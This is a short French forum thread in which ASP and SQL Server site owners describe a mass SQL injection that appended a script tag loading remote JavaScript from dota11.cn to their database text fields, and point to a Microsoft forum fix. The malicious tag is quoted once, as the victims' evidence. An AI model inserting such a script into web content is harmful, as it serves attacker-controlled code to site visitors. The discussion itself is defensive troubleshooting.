Vulnérabilité SQL serveur et ASP

Fantome -  
 razi -
Bonjour,
Voila j'ai un site developpé en asp avec une base de données SQl serveur. Un matin toutes les tables de la base on été infecté de code javascript venant de cette adresse <script src=http://www.dota11.cn/m.js></script>.
J'aimérai savoir comment l'attque a été possible et comment me protéger défiitivement.
A voir également:

3 réponses

Fred
 
Je viens de subir la meme chose

Je préciserais simplement que le robot qui a effectué l'attaque a modifie les champs varchar pour ajouter le tag script que Fantome mentionne

Est ce que vous avez une idée ?
0
Seb
 
Bonjour,

c'est la seconde fois que cela m'arrive. pas d'idées. A part refaire un restore de la base

Sébastien
0
razi
 
Le problème est discuté sur le forum Microsoft.
C'est un problème d'injection. La solution est postée.

http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=3409559&SiteID=1
0